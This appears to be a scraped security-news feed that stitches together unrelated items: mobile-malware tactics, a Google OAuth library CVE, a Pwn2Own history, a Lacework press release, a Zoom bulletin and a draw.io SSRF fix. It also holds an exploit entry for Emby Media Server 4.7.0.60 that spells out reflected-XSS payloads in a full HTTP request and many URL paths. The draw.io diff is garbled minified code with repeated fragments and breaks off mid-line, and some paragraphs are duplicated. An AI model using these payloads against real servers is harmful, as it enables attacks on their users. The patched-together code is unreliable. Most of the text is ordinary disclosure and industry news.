Mobile attacks have been going on for many years, but the threat is rapidly evolving as more sophisticated malware families with novel features enter the scene.

Mobile platforms are increasingly under threat as criminal and nation-state actors look for new ways to install malicious implants with advanced capabilities on iPhone and Android devices.

Although mobile attacks have been an ongoing problem for many years, the threat is rapidly evolving as more sophisticated malware families with novel features enter the scene.

Attackers are now actively deploying malware with full remote access capabilities, modular design, and, in some cases, worm-like characteristics that can pose significant threats to users and the companies they work for. Many of these malware families are continually improving through regular development updates, and cybercriminals are getting better at beating the review process of official app stores. Meanwhile, both the US and EU are considering new antitrust regulations that could make "sideloading" apps a consumer right.

It is important for businesses to recognize that mobile attacks are a key focus area for sophisticated threat actors. These attacks will continue to evolve as new tools and tactics emerge, posing unique challenges to traditional corporate security.

Here are six mobile malware tactics that companies need to prepare for:

**1\. On-Device Fraud  
**One of the most concerning new mobile malware advancements is the ability to carry out fraudulent actions directly from the victim’s device. Known as on-device fraud (ODF), this advanced capability has been detected in recent mobile banking Trojans, most notably Octo, TeaBot, Vultur, and Escobar. In Octo's case, the malware exploited Android's MediaProjection service (to enable screen sharing) and Accessibility Service (to perform actions on the device remotely). This hands-on remote access feature has also been enabled through an implementation of VNC Viewer, as in the case of Escobar and Vultur.

ODF marks a significant turning point for mobile attacks, which have largely focused on overlay-based credential theft and other types of data exfiltration. Although most ODF Trojans are primarily focused on financial theft, these modules could be adapted to target other types of accounts and communications tools used by businesses, such as Slack, Teams, and Google Docs.

**2\. Phone Call Redirection  
**Another troubling capability is the interception of legitimate phone calls, which recently emerged in the Fakecalls banking Trojan.

In this attack, the malware can break the connection of a user-initiated call without the caller's knowledge and redirect the call to another number under the attacker's control. Since the call screen continues to show the legitimate phone number, the victim has no way of knowing they have been diverted to a fake call service. The malware achieves this by securing call handling permission during the app installation.

**3\. Notification Direct Reply Abuse  
**In February, FluBot spyware (Version 5.4) introduced the novel capability of abusing Android’s Notification Direct Reply feature, which allows the malware to intercept and directly reply to push notifications in the applications it targets. This feature has since been discovered in other mobile malware, including Medusa and Sharkbot.

This unique capability allows the malware to sign fraudulent financial transactions, intercept two-factor authentication codes, and modify push notifications. However, this feature can also be used to spread the malware in a worm-like manner to the victim's contacts by sending automated malicious responses to social application notifications (such as WhatsApp and Facebook Messenger), a tactic known as "push message phishing."

**4\. Domain Generation Algorithm  
**The Sharkbot banking Trojan is also notable for another feature: domain generation algorithm (DGA), which it uses to avoid detection. As with other conventional malware with DGA, the mobile malware constantly creates new domain names and IP addresses for its command-and-control (C2) servers, which makes it difficult for security teams to detect and block the malware.

**5\. Bypassing App Store Detection  
**The app review process has always been a cat-and-mouse game with malware developers, but recent cybercriminal tactics are worth noting. The CryptoRom criminal campaign, for example, abused Apple’s TestFlight beta testing platform and Web Clips feature to deliver malware to iPhone users by bypassing the App Store altogether. Google Play's security process was bypassed by one criminal actor that paid developers to use its malicious SDK in their apps, which then stole personal data from users.

While droppers have become increasingly common for mobile malware distribution, researchers have recently noticed an uptick in activity in the underground market for these services, along with other distribution actors. .

**6\. More Refined Development Practices  
**While modular malware design isn't new, Android banking Trojans are now being developed with sophisticated update capabilities, such as the recently discovered Xenomorph malware. Xenomorph combines a modular design, accessibility engine, infrastructure and C2 protocol to allow for significant update capabilities that could enable it to become a far more advanced Trojan down the line, including the automatic transfer system (ATS) feature. Going forward, more mobile malware families will incorporate better update processes to enable enhanced features and entirely new functionality on compromised devices.

**Fight Back by Boosting Corporate Defenses  
**To fight back against these new mobile malware tactics, businesses need to make sure their cybersecurity programs include robust defenses. These include mobile device management solutions, multifactor authentication, and strong employee access controls. And, since mobile malware infections typically begin with social engineering, companies should provide security awareness training and consider technology that monitors communication channels for these attacks.

6 Scary Tactics Used in Mobile App Attacks

Google last month addressed a high-severity flaw in its OAuth client library for Java that could be abused by a malicious actor with a compromised token to deploy arbitrary payloads.
Tracked as CVE-2021-22573, the vulnerability is rated 8.7 out of 10 for severity and relates to an authentication bypass in the library that stems from an improper verification of the cryptographic signature.

Google last month addressed a high-severity flaw in its OAuth client library for Java that could be abused by a malicious actor with a compromised token to deploy arbitrary payloads.

Tracked as **CVE-2021-22573**, the vulnerability is rated 8.7 out of 10 for severity and relates to an authentication bypass in the library that stems from an improper verification of the cryptographic signature.

Credited with discovering and reporting the flaw on March 12 is Tamjid Al Rahat, a fourth-year Ph.D. student of Computer Science at the University of Virginia, who has been awarded $5,000 as part of Google's bug bounty program.

"The vulnerability is that the IDToken verifier does not verify if the token is properly signed," an advisory for the flaw reads.

"Signature verification makes sure that the token's payload comes from a valid provider, not from someone else. An attacker can provide a compromised token with custom payload. The token will pass the validation on the client side."

The open-source Java library, built on the Google HTTP Client Library for Java, makes it possible to obtain access tokens to any service on the web that supports the OAuth authorization standard.

Google, in its README file for the project on GitHub, notes that the library is supported in maintenance mode and that it's only fixing necessary bugs, indicative of the severity of the vulnerability.

Users of the google-oauth-java-client library are recommended to update to version 1.33.3, released on April 13, to mitigate any potential risk.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

High-Severity Bug Reported in Google's OAuth Client Library for Java

From a scrappy contest where hackers tried to win laptops, Pwn2Own has grown into a premier event that has helped normalize bug hunting.

In April 2007, when Apple's “I'm a Mac” ads were telling people that Macs can't get hacked, security researcher Dragos Ruiu decided to put the idea to the test – in front of a room full of security researchers, no less. He bought two MacBook Pros and put them on the floor of the CanSecWest conference in Vancouver, which he organized. The challenge had a catchy name, Pwn2Own: If you pwn a computer, you own it.

To Ruiu, it was more than a game. He wanted to make a “political point” that the commercials were misleading and Apple should take security seriously.

“Apple has had an on-again, off-again relationship with researchers. Sometimes they love hackers, sometimes they want to pretend hackers don't exist,” Ruiu tells Dark Reading. “This is one of those times when their marketing department used to run their security team.”

Back then, most companies also treated security researchers poorly. If someone found a flaw and reported it, they would often be threatened with lawyers. Part of Pwn2Own's merit is that it helped change that, “normalizing the concept of reporting bugs,” says Dustin Childs, communications manager for Trend Micro's Zero Day Initiative program, who now runs the event.

Throughout the years, the Pwn2Own competition has attracted high-profile researchers, including Dino Dai Zovi, Charlie Miller, George Hotz, Vincenzo Iozzo, Dion Blazakis, Ralf-Philipp Weinmann, and Jung Hoon Lee (aka Lokihardt). They’ve poked at everything, from Macs to phones, to IoT devices, industrial control systems, and even cars.

“It's a demonstration of some of the most advanced exploitation techniques that exist in the industry, at any given point in time,” says Brian Gorenc, senior director of vulnerability research at Trend Micro Gorenc. Demonstrations like these actually change how the industry looks at security.

Researchers’ efforts are well rewarded, too. Last year alone, cash prizes at Pwn2Own –

one of the highest-paying hacking competitions in the world – exceeded $2.5 million in total during multiple events.

This year’s contest, which starts today, marks its 15th anniversary and includes six categories: virtualization, Web browser, enterprise applications, server, local escalation of privilege, enterprise communications, and automotive. Whoever earns the most points will be crowned Master of Pwn, which will guarantee them “a killer trophy and a pretty snazzy jacket to boot.”

**Early Pwn2Own Wins  
**But let’s start with a recap of the first day of the 2007 CanSecWest conference, when two MacBook Pros with the latest security updates were in the spotlight, waiting to be hacked. A few researchers tried their luck, but the computers survived.

Then, security expert Shane Macaulay, who was in attendance, called former co-worker Dino Dai Zovi, based in New York, and asked him if he wanted to participate.

“I said, OK, cool, let me sit down and take a look and see what I can find,” Dai Zovi said in an interview a week after the conference. It took him five hours to detect a bug and another four to write the exploit. At 3 a.m., he called Macaulay, telling him they might actually win.

Dai Zovi found a bug in a QuickTime library loadable through a Java applet. An attacker could exploit it through any browser on Mac OS X that supports Java applets, such as Safari and Firefox. He sent his exploit to Macaulay, who put it on a website and emailed its URL to the organizers of the challenge. Once they loaded the malicious Web page, Macauley obtained a remote shell that granted him control of the laptop. The duo pwned the machine, earning them a 15-inch MacBook (which Macaulay kept since Dai Zovi had recently bought himself a laptop) and a $10,000 cash prize, courtesy of the Zero Day Initiative.

Dai Zovi says winning the first Pwn2Own event changed his life. “It was a massive benefit to my career and really put it on a different and better trajectory,” he says. “At the time, I had been writing exploits quietly as a personal hobby for almost a decade but was not at all known for it.”

The reputation he gained led him to consulting projects on iOS security and writing a book with another Pwn2Own rockstar, Charlie Miller, “The Mac Hacker's Handbook,” followed by “iOS Hacker's Handbook.”

Miller found himself in the spotlight the following year when he wrote an exploit for Safari with colleagues Jake Honoroff and Mark Daniel. “It might be because I'm biased about the things I'm good at, but \[Safari is\] the easiest browser \[to hack\],” Miller said in an interview after the competition.

**Beyond Apple  
**But Pwn2Own wasn’t only about Apple products. During the 2008 event, a Fujitsu U810 laptop running Vista was also attacked with an exploit for Adobe Flash written by Shane Macaulay, Alexander Sotirov, and Derek Callaway.

“In the very beginning, Pwn2Own was very much a browser-focused contest, and over the years, we've expanded the attack surfaces,” Gorenc says. “We've raised the prizes to make it more attractive for people to come in.”

Indeed, by 2015 the total cash prices exceeded $500,000. This month’s event, held in a hybrid format, has up to $600,000 waiting for the hacking of the Tesla Model 3, the largest target in Pwn2Own history.

But it is not only about money. “Pwn2Own was the first competition that focused on demonstrating real, working zero-day exploits against real-world software, whereas before most security competitions were capture-the-flag competitions that focused on “mock” targets and vulnerabilities,” Dai Zovi says. “It really put the focus on what was possible against the software that millions, if not billions, of people use to put a spotlight on how much we needed to improve security.”

**When ‘Wow’ Is an Understatement  
**The Pwn2Own competition has expanded to include software like MS Office, Adobe Reader, and Zoom. It has also tested the security of iPhones and BlackBerrys, and featured attacks targeting SCADA systems and IoT devices.

Some of the hacks were just mind-blowing and “times when 'wow' just isn't enough,” according to an HP Security Research blog post published during the 2015 event. That was when Jung Hoon Lee from South Korea hacked three browsers: Internet Explorer 11 (he found a time-of-check to time-of-use vulnerability), both the stable and beta version of Chrome (he exploited a buffer overflow race condition in the browser), and Safari (he exploited an uninitialized stack pointer in the browser).

  
Another exciting hack happened in 2017, when a team of researchers from Chinese Internet security company Qihoo 360 broke into VMWare's virtual machine sandbox.

“They fired up a virtual client, a fully patched Windows box. They pulled a fully patched browser and browsed to a Web page. They took their hands off the keyboard and let everything run,” Trend Micro's Childs says. “They combined enough bugs to break out of that \[sandbox\] and execute code on the underlying hypervisor on VMware Server underneath. And it was astonishing.”

  
Hacks like these made vendors feel edgy before the competition, and sometimes they would even push updates before an event.

“One year we got to Vancouver only to find out that the version of the BlackBerry deployed in Canada actually patched our bug, so we had to not sleep for two nights straight to fix the exploit,” says security expert Iozzo.

But, he adds, things like that were part of Pwn2Own's cachet. Many hackers who attended these events say they were both intense and fun. In March 2019, team Fluoroacetate, which took its name from a highly toxic substance that can kill bugs, found a severe memory randomization bug in Tesla's Model 3's infotainment system. Team members Richard Zhu and Amat Cama were crowned Masters of Pwn, earning $375,000 and the car.

  
Humor and jokes complement the stress associated with hacking.

“Last year also, we had someone hack a printer and play AC/DC through the speaker, which was pretty inventive,” Childs says. “We're dealing with a serious subject matter; the impact of these bugs can be tremendous. But at the same time, we try to keep the attitude light for the competitors so that we don't take ourselves too seriously.”

**Pwn2Own's Contributions to Bug Hunting  
**When the first edition of the Pwn2Own competition took place, the concept of hunting bugs was pretty exotic. Most companies were reluctant to talk to security researchers who reported issues, and even vendors who attended Pwn2Own events had mixed feelings about it.

But as the competition gained attention and brought everyone good publicity, companies started to open up. Looking back, security researcher Ruiu says that Pwn2Own partially assumed the role of negotiator, helping hackers get decent pay for their work.

“The manufacturers would love to just say: Have a T-shirt here,” Ruiu says. “But we became advocates for the security developers.”

As security experts and vendors met in the disclosure room to talk about hacks, the mood became less adversarial and more cooperative. The result: Bugs were fixed promptly before being exploited by a malicious entity.

Pwn2Own showed “it was OK for responsible organizations to compensate individual researchers for the hours of work put into their findings,” and led many large software companies to support bug-bounty programs, says Terri Forslof, a threat analyst at Microsoft.

Ruiu agrees, saying that Pwn2Own has helped pave the way for bug-bounty platforms like HackerOne and Bugcrowd, which work as intermediaries between researchers and tech companies. In 2021, HackerOne paid nearly $37 million for more than 66,500 valid bugs; the median earning for a critical bug was about $3,000. Also last year, Google offered bug hunters $8.7 million, while Zoom paid out $1.8 million.

Ruiu's initial goal of getting Apple to take security seriously has also been achieved, at least in part. The Cupertino, Calif., giant is currently offering up to $1 million to security experts for an exploit that results in a zero-click kernel code execution with persistence and kernel PAC bypass.

But although the role bug bounties play is undeniable, related issues remain. They still need to be formalized, says Childs, adding that such projects are not for everyone. “They're not a one-size-fits-all thing,” he says.

Many companies start bug-bounty programs without having a mature response process in place to be able to handle the reports they receive. As Childs puts it, “They get all these bugs, and they don't know what to do with them.” Organizations should have an efficient triage and specific procedures process in place to roll updates to customers, he points out.

“Until you have that basic, fundamental process available, offering a bug-bounty program is actually going to be more harmful than good because you're going to be getting bugs, and you're going to be overwhelmed by that,” Childs says. “And then you begin to have an adversarial relationship with the people who are reporting, even though you ask them to report.”

Hackers also complain. Some say they are underpaid for the bugs they discover, while others argue that their efforts are not always acknowledged in full.

During this week’s Pwn2Own, both Ruiu and ZDI hope to make one more small step in the right direction. “It still continues to change; it evolves continuously,” Ruiu says. “One of our goals is to improve the relationship between vendors and independent researchers.”

How Pwn2Own Made Bug Hunting a Real Sport

Polygraph Data Platform adds Kubernetes audit log monitoring, integration with Kubernetes admission controller, and Infrastructure as Code (IaC) security to help seamlessly integrate security into developer workflows.

SAN JOSE, Calif., May 18, 2022 /PRNewswire/ -- Lacework, the data-driven cloud security company, today announced new features added to the Polygraph® Data Platform which provide enhanced visibility and protection in Kubernetes environments. Through Kubernetes audit log monitoring, integration with the Kubernetes admission controller, and Infrastructure as Code (IaC) security, Lacework customers can now further minimize risks in build time and automate discovery of unusual behavior that could signify cloud account or container compromise. With these new features, Lacework is the only company which can offer automated anomaly detection that provides consistent visibility, context, and security across the entirety of a customer's multi-cloud environment from a single security platform.

According to Gartner® (1), "by 2026, more than 90% of global organizations will be running containerized applications in production, which is a significant increase from less than 40% today."

As more organizations leverage container-based application deployment to scale their businesses, they are rapidly adopting Kubernetes to manage containerized workloads. While easier to manage overall, the complexity and sheer size of Kubernetes environments makes it difficult for companies to detect threats, ensure compliance, and efficiently capture relevant security events. Existing security tools and manual procedures aren't built to secure the Kubernetes attack surface, which slows down agile development and defeats the purpose of using containers. This forces customers to employ additional Kubernetes-specific tools, further slowing down understaffed security teams with additional tool sprawl and alert fatigue. In fact, Red Hat found in its 2021 State of Kubernetes Security Report that more than half of respondents delayed deploying Kubernetes applications into production due to security concerns. Developers need more automated practices to quickly resolve issues and focus on delivering revenue-driving initiatives.

Lacework eliminates this challenge by integrating container security into the Polygraph Data Platform, providing end-to-end, integrated monitoring that enables customers to secure their cloud and Kubernetes environments from build to runtime. By consolidating disparate tools into a single platform, Lacework provides a highly automated solution that empowers organizations to seamlessly integrate security into developer workflows. The new features announced today provide comprehensive visibility, threat detection and alerts, configuration and compliance checks, and vulnerability scans:

Kubernetes Audit Logs Monitoring: A typical Kubernetes environment could include thousands of pods and containers with components constantly being created, shut down, or moved, and generating millions of events daily. This feature enables customers to monitor Kubernetes audit logs and all user and system actions to detect unknown and known threats.

Kubernetes Admission Controller: Through this integration, the Polygraph Data Platform can scan containers for misconfigurations or vulnerabilities prior to deployment on Kubernetes. Customers can use pre-built or customer policies to define the criteria, threshold, and response for a violation.

IaC Security: Using capabilities available following the acquisition of Soluble, Lacework customers can now review Infrastructure as Code prior to deployment to identify and optionally block insecure Kubernetes-related configurations.

"Containerized workloads are already difficult for many security solutions to keep up with because of their ephemeral and constantly changing nature. At scale, it's impossible for often understaffed security teams to effectively secure these environments," said Frank Dickson, Group Vice President, Security & Trust research practice, IDC. "Any benefit organizations get from deploying Kubernetes environments is negated by security approaches which don't provide security teams with the same automation Kubernetes provides to developers."

"We chose Lacework because it provides a fully integrated platform for cloud security. Before Lacework, we lacked the granularity and depth we needed to assess vulnerabilities due to numerous disparate tools," said Michael Lyborg, Senior Vice President, Global Information Security & Enterprise IT at Swimlane. "By integrating Lacework and the Swimlane low-code automation platform we automated our container image scans. This has resulted in time savings, better prioritization of work, faster iteration and validation of builds. The integration gave us the ability to retroactively and continuously scan published images so we have a continuous real-time view of risk across our dynamic cloud environment."

"While so much innovation has focused on helping developers work more efficiently to create revenue-driving initiatives, very little has been applied to the security tools that keep businesses safe, reducing the gains of development teams and ultimately putting organizations at risk," said Adam Leftik, VP of Product, Lacework. "Security teams are as important as developers in driving revenue for businesses, and these Kubernetes features for the Polygraph Data Platform ensure they can help teams across the business innovate securely and with confidence."

The Lacework Polygraph Data Platform is the only solution that extends automated anomaly detection across AWS, Google Cloud and now Microsoft Azure and Kubernetes EKS environments. Using accurate, machine learning-based threat detection at scale, the Polygraph Data Platform empowers customers to innovate with confidence.

Kubernetes audit logs monitoring is now available to Lacework customers on AWS EKS in limited availability. The Kubernetes admission controller integration is generally available. Integration with IaC security is available to all Lacework customers.

**Additional Resources:**

Visit our team at KubeCon EMEA at booth S47 on the show floor.

Check out the Lacework blog to learn more about Kubernetes audit log monitoring, our integration with the Kubernetes admission controller, and IaC security.

Become an expert on security fundamentals and learn more from your security and developer peers through Lacework Academy and the Lacework Community.

Read what Lacework customers have to say about the Lacework Polygraph Data Platform.

For more information about how to join the Lacework team, visit our careers page.

(1) Gartner, "Compute Evolution: VMs, Containers, Serverless — Which to Use When?",  
Refreshed 22 March 2022, Arun Chandrasekaran, Published 1 June 2021,  
https://www.gartner.com/document/4002112?ref=TypeAheadSearch

GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.

**About Lacework**

Lacework is the data-driven security company for the cloud. The Lacework Polygraph® Data Platform automates cloud security at scale so our customers can innovate with speed and safety. Only Lacework can collect, analyze, and accurately correlate data across an organization's AWS, Microsoft Azure, Google Cloud, and Kubernetes environments, and narrow it down to the handful of security events that matter. Customers all over the globe depend on Lacework to drive revenue, bring products to market faster and safer, and consolidate point security solutions into a single platform. Founded in 2015 and headquartered in San Jose, Calif., Lacework is backed by leading investors like Sutter Hill Ventures, Altimeter Capital, D1 Capital Partners, Tiger Global Management, Counterpoint Global (Morgan Stanley), Franklin Templeton, Durable Capital, GV, General Catalyst, XN, Coatue, Dragoneer, Liberty Global Ventures, and Snowflake Ventures, among others. Get started at www.lacework.com.

SOURCE Lacework

Lacework Integrates Kubernetes Features to Enhance Security Across Multi-Cloud Environments

Emby Media Server version 4.7.0.60 suffers from a cross site scripting vulnerability.

    # Exploit Title: Emby Media Server 4.7.0.60 Cross Site Scripting # Google Dork: NA# Date: 18/05/2022# Exploit Author: Yehia Elghaly# Vendor Homepage: https://emby.media/# Software Link: https://emby.media/windows-server.html# Version: 4.7.0.60# Tested on: Windows 7 / 10Summary: Emby (formerly Media Browser) is a media server designed to organize, play, and stream audio and video to a variety of devices. Emby is open-source, and uses a client-server model.Description: Reflected XSS  found on the follwoing paths GET /web/index.htmlwkdlv%3cimg%20src%3da%20onerror%3dalert('xssyf')%3etsz47 HTTP/1.1Host: 192.168.1.99:8096Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Accept-Encoding: gzip, deflateAccept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36Connection: closeCache-Control: max-age=0/web/apploader.jsgavm5%3cimg%20src%3da%20onerror%3dalert(1)%3efekx9?v=4.7.0.60/web/manifest.jsono32b7%3cimg%20src%3da%20onerror%3dalert(1)%3ebhmxn /web/modules/common/strings/en-GB.jsons0ult%3cimg%20src%3da%20onerror%3dalert(1)%3es9n62?v=4.7.0.60/web/modulesd3s7a%3cimg%20src%3da%20onerror%3dalert(1)%3ez7ego/common/strings/en-GB.json?v=4.7.0.60 /web/modules/commonat2op%3cimg%20src%3da%20onerror%3dalert(1)%3eobgl7/strings/en-GB.json?v=4.7.0.60/web/modules/common/stringshh0u9%3cimg%20src%3da%20onerror%3dalert(1)%3et78cc/en-GB.json?v=4.7.0.60/web/modules/themes/dark/theme.jsonl0ofz%3cimg%20src%3da%20onerror%3dalert(1)%3edltvh?v=4.7.0.60/web/modulesx4l2h%3cimg%20src%3da%20onerror%3dalert(1)%3emr73x/themes/dark/theme.json?v=4.7.0.60 /web/modules/themesm2gyr%3cimg%20src%3da%20onerror%3dalert(1)%3ek2oyi/dark/theme.json?v=4.7.0.60/web/modules/themes/darknhu2c%3cimg%20src%3da%20onerror%3dalert(1)%3ez9cpp/theme.json?v=4.7.0.60/web/startup/login.htmljpi2c%3cimg%20src%3da%20onerror%3dalert(1)%3enwvie?v=4.7.0.60/web/startupipm82%3cimg%20src%3da%20onerror%3dalert(1)%3ei44hr/login.html?v=4.7.0.60/web/strings/en-GB.jsonqulu8%3cimg%20src%3da%20onerror%3dalert(1)%3eghzge?v=4.7.0.60/web/stringsxyvvd%3cimg%20src%3da%20onerror%3dalert(1)%3ewliqe/en-GB.json?v=4.7.0.60

Emby Media Server 4.7.0.60 Cross Site Scripting

The Zoom Client for Meetings (for Android, iOS, Linux, MacOS, and Windows) before version 5.10.0 failed to properly parse XML stanzas in XMPP messages. This can allow a malicious user to break out of the current XMPP message context and create a new message context to have the receiving users client perform a variety of actions.This issue could be used in a more sophisticated attack to forge XMPP messages from the server.

CVE-2022-22784: Security Bulletin

Server-Side Request Forgery (SSRF) in GitHub repository jgraph/drawio prior to 18.0.7.

@@ -468,7 +468,7 @@ a),DRAWIO\_GITLAB\_URL=a);a=urlParams\["gitlab-id"\];null!=a&&(DRAWIO\_GITLAB\_ID=a);w if("1"==urlParams.offline||"1"==urlParams.demo||"1"==urlParams.stealth||"1"==urlParams.local||"1"==urlParams.lockdown)urlParams.picker="0",urlParams.gapi="0",urlParams.db="0",urlParams.od="0",urlParams.gh="0",urlParams.gl="0",urlParams.tr="0"; "se.diagrams.net"==window.location.hostname&&(urlParams.db="0",urlParams.od="0",urlParams.gh="0",urlParams.gl="0",urlParams.tr="0",urlParams.plugins="0",urlParams.mode="google",urlParams.lockdown="1",window.DRAWIO\_GOOGLE\_APP\_ID=window.DRAWIO\_GOOGLE\_APP\_ID||"184079235871",window.DRAWIO\_GOOGLE\_CLIENT\_ID=window.DRAWIO\_GOOGLE\_CLIENT\_ID||"184079235871-pjf5nn0lff27lk8qf0770gmffiv9gt61.apps.googleusercontent.com");"trello"==urlParams.mode&&(urlParams.tr="1"); "embed.diagrams.net"==window.location.hostname&&(urlParams.embed="1");(null==window.location.hash||1>=window.location.hash.length)&&null!=urlParams.open&&(window.location.hash=urlParams.open);window.urlParams=window.urlParams||{};window.MAX\_REQUEST\_SIZE=window.MAX\_REQUEST\_SIZE||10485760;window.MAX\_AREA=window.MAX\_AREA||225E6;window.EXPORT\_URL=window.EXPORT\_URL||"/export";window.SAVE\_URL=window.SAVE\_URL||"/save";window.OPEN\_URL=window.OPEN\_URL||"/open";window.RESOURCES\_PATH=window.RESOURCES\_PATH||"resources";window.RESOURCE\_BASE=window.RESOURCE\_BASE||window.RESOURCES\_PATH+"/grapheditor";window.STENCIL\_PATH=window.STENCIL\_PATH||"stencils";window.IMAGE\_PATH=window.IMAGE\_PATH||"images"; window.STYLE\_PATH=window.STYLE\_PATH||"styles";window.CSS\_PATH=window.CSS\_PATH||"styles";window.OPEN\_FORM=window.OPEN\_FORM||"open.html";window.mxBasePath=window.mxBasePath||"mxgraph";window.mxImageBasePath=window.mxImageBasePath||"mxgraph/images";window.mxLanguage=window.mxLanguage||urlParams.lang;window.mxLanguages=window.mxLanguages||\["de","se"\];var mxClient={VERSION:"18.0.6",IS\_IE:null!=navigator.userAgent&&0<=navigator.userAgent.indexOf("MSIE"),IS\_IE11:null!=navigator.userAgent&&!!navigator.userAgent.match(/Trident\\/7\\./),IS\_EDGE:null!=navigator.userAgent&&!!navigator.userAgent.match(/Edge\\//),IS\_EM:"spellcheck"in document.createElement("textarea")&&8==document.documentMode,VML\_PREFIX:"v",OFFICE\_PREFIX:"o",IS\_NS:null!=navigator.userAgent&&0<=navigator.userAgent.indexOf("Mozilla/")&&0>navigator.userAgent.indexOf("MSIE")&&0>navigator.userAgent.indexOf("Edge/"), window.STYLE\_PATH=window.STYLE\_PATH||"styles";window.CSS\_PATH=window.CSS\_PATH||"styles";window.OPEN\_FORM=window.OPEN\_FORM||"open.html";window.mxBasePath=window.mxBasePath||"mxgraph";window.mxImageBasePath=window.mxImageBasePath||"mxgraph/images";window.mxLanguage=window.mxLanguage||urlParams.lang;window.mxLanguages=window.mxLanguages||\["de","se"\];var mxClient={VERSION:"18.0.7",IS\_IE:null!=navigator.userAgent&&0<=navigator.userAgent.indexOf("MSIE"),IS\_IE11:null!=navigator.userAgent&&!!navigator.userAgent.match(/Trident\\/7\\./),IS\_EDGE:null!=navigator.userAgent&&!!navigator.userAgent.match(/Edge\\//),IS\_EM:"spellcheck"in document.createElement("textarea")&&8==document.documentMode,VML\_PREFIX:"v",OFFICE\_PREFIX:"o",IS\_NS:null!=navigator.userAgent&&0<=navigator.userAgent.indexOf("Mozilla/")&&0>navigator.userAgent.indexOf("MSIE")&&0>navigator.userAgent.indexOf("Edge/"), IS\_OP:null!=navigator.userAgent&&(0<=navigator.userAgent.indexOf("Opera/")||0<=navigator.userAgent.indexOf("OPR/")),IS\_OT:null!=navigator.userAgent&&0<=navigator.userAgent.indexOf("Presto/")&&0>navigator.userAgent.indexOf("Presto/2.4.")&&0>navigator.userAgent.indexOf("Presto/2.3.")&&0>navigator.userAgent.indexOf("Presto/2.2.")&&0>navigator.userAgent.indexOf("Presto/2.1.")&&0>navigator.userAgent.indexOf("Presto/2.0.")&&0>navigator.userAgent.indexOf("Presto/1."),IS\_SF:/Apple Computer, Inc/.test(navigator.vendor), IS\_ANDROID:0<=navigator.appVersion.indexOf("Android"),IS\_IOS:/iP(hone|od|ad)/.test(navigator.platform)||navigator.userAgent.match(/Mac/)&&navigator.maxTouchPoints&&2<navigator.maxTouchPoints,IS\_WEBVIEW:/((iPhone|iPod|iPad).\*AppleWebKit(?!.\*Version)|; wv)/i.test(navigator.userAgent),IS\_GC:/Google Inc/.test(navigator.vendor),IS\_CHROMEAPP:null!=window.chrome&&null!=chrome.app&&null!=chrome.app.runtime,IS\_FF:"undefined"!==typeof InstallTrigger,IS\_MT:0<=navigator.userAgent.indexOf("Firefox/")&&0>navigator.userAgent.indexOf("Firefox/1.")&& 0>navigator.userAgent.indexOf("Firefox/2.")||0<=navigator.userAgent.indexOf("Iceweasel/")&&0>navigator.userAgent.indexOf("Iceweasel/1.")&&0>navigator.userAgent.indexOf("Iceweasel/2.")||0<=navigator.userAgent.indexOf("SeaMonkey/")&&0>navigator.userAgent.indexOf("SeaMonkey/1.")||0<=navigator.userAgent.indexOf("Iceape/")&&0>navigator.userAgent.indexOf("Iceape/1."),IS\_SVG:"MICROSOFT INTERNET EXPLORER"!=navigator.appName.toUpperCase(),NO\_FO:!document.createElementNS||"\[object SVGForeignObjectElement\]"!== @@ -11694,7 +11694,7 @@ D.appendChild(R);Q.appendChild(D);this.container=Q};var W=ChangePageSetup.protot this.format);null!=this.mathEnabled&&(this.page.viewState.mathEnabled=this.mathEnabled);null!=this.shadowVisible&&(this.page.viewState.shadowVisible=this.shadowVisible)}}else W.apply(this,arguments),null!=this.mathEnabled&&this.mathEnabled!=this.ui.isMathEnabled()&&(this.ui.setMathEnabled(this.mathEnabled),this.mathEnabled=!this.mathEnabled),null!=this.shadowVisible&&this.shadowVisible!=this.ui.editor.graph.shadowVisible&&(this.ui.editor.graph.setShadowVisible(this.shadowVisible),this.shadowVisible= !this.shadowVisible)};Editor.prototype.useCanvasForExport=!1;try{var U=document.createElement("canvas"),X=new Image;X.onload=function(){try{U.getContext("2d").drawImage(X,0,0);var u=U.toDataURL("image/png");Editor.prototype.useCanvasForExport=null!=u&&6<u.length}catch(D){}};X.src="data:image/svg+xml;base64,"+btoa(unescape(encodeURIComponent('<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="1px" height="1px" version="1.1"><foreignObject pointer-events="all" width="1" height="1"><div xmlns="http://www.w3.org/1999/xhtml"></div></foreignObject></svg>')))}catch(u){}})(); (function(){var b=new mxObjectCodec(new ChangePageSetup,\["ui","previousColor","previousImage","previousFormat"\]);b.beforeDecode=function(e,f,c){c.ui=e.ui;return f};b.afterDecode=function(e,f,c){c.previousColor=c.color;c.previousImage=c.image;c.previousFormat=c.format;null!=c.foldingEnabled&&(c.foldingEnabled=!c.foldingEnabled);null!=c.mathEnabled&&(c.mathEnabled=!c.mathEnabled);null!=c.shadowVisible&&(c.shadowVisible=!c.shadowVisible);return c};mxCodecRegistry.register(b)})(); (function(){var b=new mxObjectCodec(new ChangeGridColor,\["ui"\]);b.beforeDecode=function(e,f,c){c.ui=e.ui;return f};mxCodecRegistry.register(b)})();(function(){EditorUi.VERSION="18.0.6";EditorUi.compactUi="atlas"!=uiTheme;Editor.isDarkMode()&&(mxGraphView.prototype.gridColor=mxGraphView.prototype.defaultDarkGridColor);EditorUi.enableLogging="1"!=urlParams.stealth&&"1"!=urlParams.lockdown&&(/.\*\\.draw\\.io$/.test(window.location.hostname)||/.\*\\.diagrams\\.net$/.test(window.location.hostname))&&"support.draw.io"!=window.location.hostname;EditorUi.drawHost=window.DRAWIO\_BASE\_URL;EditorUi.lightboxHost=window.DRAWIO\_LIGHTBOX\_URL;EditorUi.lastErrorMessage= (function(){var b=new mxObjectCodec(new ChangeGridColor,\["ui"\]);b.beforeDecode=function(e,f,c){c.ui=e.ui;return 